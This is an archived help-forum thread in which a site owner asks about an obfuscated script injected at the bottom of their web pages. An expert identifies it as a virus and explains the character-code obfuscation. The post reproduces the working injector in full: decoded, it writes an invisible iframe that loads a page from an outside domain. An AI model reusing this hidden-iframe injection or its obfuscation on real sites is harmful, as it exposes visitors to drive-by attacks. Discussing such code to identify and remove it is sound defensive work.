Solved

Javascript Added to bottom of site - Virus

Posted on 2009-05-05
8
323 Views
Last Modified: 2013-12-09
Hi All,

Hoping someone can answer this, the following code is getting added to the bottom of our site and it does look like a virus. Does anyone know what it is or how it is getting there. Just so you know, it is not on our local files and is only on the remote. Any info will be appreciated.



</html><script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>

Open in new window

0
Comment
Question by:jimbinho
  • 5
  • 3
8 Comments
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304108
Yes, it is a virus.

How did it get there?  I don't know.

Remove it...

0
 

Author Comment

by:jimbinho
ID: 24304137
Hi,

Thanks for this. I think to be more specific what i am looking for is: what the code does when scrambled as i am assuming it is scrambled java script. I would also like to know how anyone would do this and if anyone has seen anything like this before can they shed any light?

Thanks
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304167
here is what it translates as...
iframeCode.jpg
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24305101
How would someone do this?

Well, they would first figure out what they want to generate (e.g., the "iframe" shown above), then put that in a string, and convert the individual characters into numeric values.  For example, using something like the code shown below.

Then, they would take the numbers, and put them into an array, and from the array, create a string.

... does that make sense?



<html>

<body>
 

<script type="text/javascript">
 

var str='<iframe width="480"'

for ( var i = 0; i < str.length; i++ ) {

  document.write( str[ i ] + ' = ' + str.charCodeAt( i ) + '<br />')

}

</script>
 

</body>

</html>

Open in new window

0
Maximize Your Threat Intelligence Reporting

Reporting is one of the most important and least talked about aspects of a world-class threat intelligence program. Here’s how to do it right.

 

Author Comment

by:jimbinho
ID: 24306426
Hi,

Thanks for this. My question is not so much how they created the string, but how it is likely to get onto our site. Thanks for your help.
0
 
LVL 41

Accepted Solution

by:
HonorGod earned 500 total points
ID: 24306495
Ah, now that's a real question.

There are a number of possibilities.  Unfortunately, I don't know for certain, especially without knowing specifics about the server on which this code was found, or who has access to it, or the kind of programs that execute on it, etc.
0
 

Author Closing Comment

by:jimbinho
ID: 31577958
Appreciate the help
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24421987
Thanks for the grade & points.  I'm sorry that you didn't feel the information warranted an A.

Good luck & have a great day
0

Featured Post

Find Ransomware Secrets With All-Source Analysis

Ransomware has become a major concern for organizations; its prevalence has grown due to past successes achieved by threat actors. While each ransomware variant is different, we’ve seen some common tactics and trends used among the authors of the malware.

Join & Write a Comment

Suggested Solutions

Title # Comments Views Activity
Antivirus On Virtual Machines 7 117
Russian pop up ad virus 8 102
iOS vulnerability (9.3.5) 5 68
Zeus black pop up screen virus 7 53
Change your password...do it now!. Probably the easiest point of access to your account is through guessing your password. If your password is guessable, do change it now. If not for your sake but for everyone else in your friends list. Remember …
By the time you finish reading this article, you may have already lost all your money because you don't know the simple steps to securing your BitCoin wallet. BitCoin is an incredible invention. It is a decentralized currency system, which is the…
Illustrator's Shape Builder tool will let you combine shapes visually and interactively. This video shows the Mac version, but the tool works the same way in Windows. To follow along with this video, you can draw your own shapes or download the file…
Access reports are powerful and flexible. Learn how to create a query and then a grouped report using the wizard. Modify the report design after the wizard is done to make it look better. There will be another video to explain how to put the final p…

746 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

10 Experts available now in Live!

Get 1:1 Help Now